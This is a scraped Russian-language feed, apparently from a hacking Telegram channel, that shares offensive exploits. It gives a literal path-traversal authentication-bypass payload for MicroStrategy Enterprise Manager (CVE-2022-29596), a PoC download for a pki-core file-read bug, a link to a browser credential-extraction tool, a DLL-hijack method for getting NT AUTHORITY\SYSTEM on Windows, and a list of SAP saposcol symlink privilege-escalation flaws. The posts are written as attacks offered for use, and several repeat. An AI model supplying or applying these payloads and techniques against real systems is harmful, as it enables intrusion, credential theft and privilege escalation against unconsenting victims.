CVE-2022-29596
MicroStrategy Enterprise Manager 2022
обходим аутентификацию, вызывая ошибку входа в систему, а затем вводя:
MicroStrategy Enterprise Manager 2022
обходим аутентификацию, вызывая ошибку входа в систему, а затем вводя:
Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=_any_password_&ConnMode=1&3054=Login
#microsoft #bypass🔥5
CVE-2022-2414-POC.zip
1.2 KB
CVE-2022-2414
Дырка в pki-core
уязвимость позволяет удаленному злоумышленнику получить содержимое произвольных файлов, отправив специально созданные HTTP-запросы.
Дырка в pki-core
уязвимость позволяет удаленному злоумышленнику получить содержимое произвольных файлов, отправив специально созданные HTTP-запросы.
👍4🔥1
Forwarded from null
в предложку кстати
GitHub
GitHub - moonD4rk/HackBrowserData: Extract and decrypt browser data, supporting multiple data types, runnable on various operating…
Extract and decrypt browser data, supporting multiple data types, runnable on various operating systems (macOS, Windows, Linux). - moonD4rk/HackBrowserData
🔥9👍2😱2
DirCreate2System
Получаем
Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.
*
DOWNLOAD POC
#windows #escpriv #POC #system
Получаем
NT AUTHORITY\\SYSTEM
*Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.
*
DOWNLOAD POC
#windows #escpriv #POC #system
👍5
Privilege Escalation Vulnerabilities (UNIX Insecure File Handling)
*
1. UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging
2. UNIX Symlink Following and Race Condition in Hardware Reporting
3. UNIX Symlink Following and Race Condition in System Log Feature of saposcol
4. UNIX Symlink Following in Log File Creation of saposcol
5. UNIX Symlink Following in Shared Memory Dump File Creation of saposcol
#linux #privesc #sec
*
1. UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging
2. UNIX Symlink Following and Race Condition in Hardware Reporting
3. UNIX Symlink Following and Race Condition in System Log Feature of saposcol
4. UNIX Symlink Following in Log File Creation of saposcol
5. UNIX Symlink Following in Shared Memory Dump File Creation of saposcol
#linux #privesc #sec
👍6